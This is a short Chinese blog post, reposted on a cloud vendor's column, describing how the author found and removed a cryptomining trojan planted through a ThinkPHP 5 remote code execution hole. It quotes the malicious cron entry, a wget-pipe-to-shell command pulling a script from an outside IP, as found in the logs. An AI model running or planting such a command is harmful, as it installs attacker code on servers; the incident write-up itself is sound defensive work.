资讯专栏INFORMATION COLUMN

记一次挂马清除经历:处理一个利用thinkphp5远程代码执行漏洞挖矿的木马

incredible / 3130人阅读

摘要:再看下的的权限就是的查看下几个站的日志发现是利用最近爆出的远程代码执行漏洞漏洞细节修复一下问题解决但是这个站点是测试站点端口监听的是,难道现在黑客能开始嗅探非常规端口了来源

昨天发现 一台服务器突然慢了 top 显示 几个进程100%以上的cpu使用

执行命令为 :

/tmp/php -s /tmp/p2.conf

基本可以确定是被挂马了

下一步确定来源

last 没有登陆记录

先干掉这几个进程,但是几分钟之后又出现了

先看看这个木马想干什么吧

netstat 看到 这个木马开启了一个端口和国外的某个ip建立了连接

但是tcpdump了一小会儿 没有发现任何数据传递

这他是想干啥?

继续查看日志吧

在cron日志中发现了www用户 有一个crontab定时操作 基本就是这个问题了

wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1

顺着下载了几个问题,看了看 应该是个挖矿的木马程序

服务器上的www用户 是安装 lnmp 创建的,看了来源很可能就是web漏洞了。

再看/tmp下的php的权限 就是www的

查看 lnmp下几个站的日志 发现是利用 thinkphp 5最近爆出的远程代码执行漏洞

漏洞细节:https://nosec.org/home/detail...

修复一下问题解决

但是 这个站点是测试站点 端口监听的是 8083 ,难道现在黑客能开始嗅探非常规端口了?

来源:https://www.simapple.com/425....

文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。

转载请注明本文地址:https://www.ucloud.cn/yun/29821.html

相关文章

  • 阿里云服务器被挖矿怎么解决

    摘要:微软雅黑宋体春节刚开始,我们安全,发布了年服务器被挖矿的整体安全分析报告。我们调查分析发现,从网站漏洞被爆出后到修复漏洞的时间约大,一些网站被攻击的状况就越严重,服务器被挖矿的事情就会发生,如果及时的修复漏洞,那么就可以避免被挖矿。春节刚开始,我们SINE安全,发布了2018年服务器被挖矿的整体安全分析报告。该安全报告主要是以我们去年的整一年的安全数据为基础,对这些服务器的被挖矿的整体情况进...

    jas0n 评论0 收藏0
  • 道路千万条,安全第一条——一次服务器被入侵的处理经过

    摘要:为了进一步确认,再次到威胁情报平台进行查询。再结合我部署的容器停止时间进行分析,应该是在我部署完成后几小时内服务器被入侵的。要从根本上解决问题需要进行溯源分析,避免服务器再次被入侵。结合以上线索以及个人经验分析,很可能利用的漏洞进行入侵的。 容器为何自动停止? 服务器为何操作卡顿? 进程的神秘连接到底指向何处? 发现——自动停止的容器 某日发现部署在服务器上的一个容器被停掉了,开始以为...

    aaron 评论0 收藏0

发表评论

0条评论

incredible

|高级讲师

TA的文章

阅读更多
最新活动
阅读需要支付1元查看
<